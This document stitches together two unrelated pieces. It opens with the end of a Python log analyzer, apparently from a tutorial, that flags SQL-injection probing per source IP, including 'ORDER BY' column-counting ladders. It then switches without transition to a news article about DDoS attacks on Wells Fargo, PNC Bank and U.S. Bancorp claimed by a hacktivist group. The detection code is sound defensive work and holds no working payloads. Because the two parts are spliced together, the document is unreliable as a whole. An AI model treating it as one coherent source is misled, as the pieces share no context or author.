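        prev = v
    return best


def analyze(log_text: str) -> dict:
    """Aggregate indicators per source IP. An IP is reported only when some
    signal fired; 'ladder' is set when it walked ORDER BY upward three or
    more times, which is the column-counting step described above."""
    per_ip = defaultdict(lambda: {"signals": set(), "order_by": [], "requests": 0,
                                  "first": None, "last": None})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue                        # not a combined-format line; skip
        signals, order_by = classify_request(m["target"])
        if not signals:
            continue                        # ordinary traffic
        rec = per_ip[m["ip"]]
        rec["requests"] += 1
        rec["signals"] |= signals
        rec["order_by"] += order_by
        rec["first"] = rec["first"] or m["ts"]
        rec["last"] = m["ts"]
    for rec in per_ip.values():
        rec["ladder"] = longest_increasing_run(rec["order_by"]) >= 3
        rec["order_by_max"] = max(rec["order_by"], default=None)
    return dict(per_ip)


if __name__ == "__main__":
    for ip, rec in analyze(SAMPLE_LOG).items():
        print(ip, sorted(rec["signals"]), "ladder" if rec["ladder"] else "",
              rec["first"], "->", rec["last"])
```

Matching the decoded query string rather than the raw one matters: `%27`, `+` and `%20` are how these payloads actually appear on the wire. The per-address ladder check is what separates a methodical enumeration from a single stray quote typed into a search box, so it is the better alerting trigger; the individual signals are still worth keeping as context for the analyst.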
DDoS attacks hit Wells Fargo, PNC Bank, U.S. Bancorp
DDoS attacks against major U.S. banking websites are continuing this week, with Wells Fargo, PNC Bank and U.S. Bancorp all falling victim, according to reports.
The source of the attacks, which are flooding the websites with so much traffic that they become unavailable, is still not known, though a hacktivist group calling itself the "Mrt. Izz ad-Din al-Qassam Cyber Fighters" reportedly took credit in a Pastebin post, which has since been removed. It said it launched the attacks in protest at the anti-Muslim film "Innocence of Muslims," which has helped spark outrage in the Middle East against the United States.
That's the same collective that took responsibility for a string of DDoS attacks last week against Bank of America.
Mike Smith, security evangelist at web services provider Akamai, said DDoS attacks that knock out access to popular commercial websites are not uncommon.
"This kind of stuff happens all the time," he told SCMagazine.com on Thursday. "Usually people don't talk about them. Over the past couple of years, people have talked about them because the attackers' intent is to get publicity. That's where hacktivists come along. For them, it's free public relations."
Smith said it's also possible the latest DDoS attacks are the work of an organized crime group, or are being launched merely as a distraction and a way to slow the bank's response to actual fraud taking place. But this doesn't appear to be the case.
Either way, according to those who have studied this latest round of attacks, they are powerful.
"From what I've been told (I'm not a network security specialist) the leading DDoS prevention software more or less stops working when the attacks get larger than 60-70 gigabytes and simply can't handle the bandwidth of these 100-plus gigabyte attacks," Avivah Litan, vice president and distinguished analyst of Gartner, wrote in a blog post on Thursday. "The major ISPs only have a few hundred gigabytes bandwidth for all their customers, and even if they added more on to that, the hacktivists could quickly and easily eat the additional bandwidth up."
As of this writing, one of the attacks appears to be ongoing: The website for PNC Bank is not reachable.
"Our systems are performing well today," Nicole Garrison-Sprenger, a U.S. Bancorp spokeswoman, told SCMagazine.com. "The attacks yesterday caused intermittent delays for some consumers visiting our website, but we can assure customers that their data and funds are secure. These issues are related to unusual and coordinated high traffic volume designed to slow down the system -- similar to what other banks have experienced in the past week."
A spokeswoman for Wells Fargo said its site is back functioning normally.
"We appreciate our customers' patience and apologize for any inconvenience," she said.